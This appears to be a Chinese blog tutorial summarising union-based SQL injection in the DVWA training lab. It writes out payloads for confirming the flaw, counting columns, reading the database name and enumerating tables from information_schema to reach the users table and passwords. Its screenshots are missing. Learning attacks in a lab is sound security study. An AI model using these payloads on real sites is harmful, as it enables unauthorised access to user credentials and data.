SQL注入小结

本文详细介绍了SQL注入中的union注入原理,包括漏洞判断方法、字段数检测,以及如何利用union联合查询获取敏感数据,如用户表信息和直接获取密码。着重讲解了在dvwa库下的进阶攻击策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入小结

一.union注入的原理以及代码演示:

1.1SQL注入漏洞的判断:

1‘ and 1=1; #与1’ and 1=2; #的返回页面是否不一样:

发现不一样,则初步判断存在SQL注入漏洞

1.2SQL注入字段数的判断:

1‘ order by 1,2,3; #如果当为3的时候出现报错,则说明字段数为2

1.3 union联合查询获取敏感信息:

1’and 1=2 union select 1, 2; #

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

说明可以使用union all

进一步获取信息:1’and 1=2 union select 1, (database()); #

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

替换之后可查其他信息:

1.4进阶SQL注入攻击:

目前已知 dvwa库下有两个字段:我们尝试获取下一步信息:

1'and 1=2 union select 1, (select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,2); #

limit(1,?)可以替换,这里我理解为有几个字段。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

最终得到两个字段为:guestbook users

users表示用户,接下来我们主要获取user表里的信息:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

最后直接出密码:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

]

最后直接出密码:

[外链图片转存中…(img-RVWwLA1L-1693384676072)]

注意:这只是非常简单,没有任何过滤的情况。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值